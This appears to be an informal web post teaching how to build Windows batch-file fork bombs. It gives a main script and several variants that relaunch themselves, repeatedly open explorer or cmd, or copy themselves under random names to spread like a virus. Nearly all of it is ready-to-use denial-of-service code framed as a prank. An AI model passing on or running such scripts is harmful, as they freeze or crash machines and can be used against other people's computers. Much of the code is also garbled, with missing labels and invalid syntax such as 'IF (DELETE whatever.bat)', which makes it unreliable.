how to make a fork bomb exe
open up notepad and enter the following text:
start %0
goto :fork
save it as something.bat
to the desktop
there are about a million different ways to do this, i gave you disputably the best one, other variants include:
my favorite is the spread like a real virus bomb
explorer bomb:
start %0
start C:\Windows\explorer.exe
goto :e
program bomb:
start %0
start anyprogramyouwant
goto :e
the mini bomb:
inefficient bombs:
goto :e
start cmd.exe
goto :e
start (name of the batch file)
goto :e
slap in the face for deleting this bomb:
IF (DELETE whatever.bat) goto :e
IF (ERASE whatever.bat
start %0
goto :e
matrix bomb:
@echo off
color 0a
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% (lots of randoms)
start %0
goto :x
spread like a real virus bomb:
copy /Y %0 %random%.bat
start %0
goto :e
alphabet fork:
start %0
goto :a
start %0
goto :b
start %0
goto :c
start %0
goto :d
start %0
goto :e
start %0
goto :g
start %0
goto :i
start %0
goto :j
start %0
goto :k
start %0
goto :l
start %0
goto :m
start %0
goto :n
start %0
goto :o
start %0
goto :p
start %0
goto :q
start %0
goto :r
start %0
goto :s
start %0
goto :t
start %0
goto :u
start %0
goto :v
start %0
goto :w
start %0
goto :x
start %0
goto :y
start %0
goto :z
start %0
goto :bob
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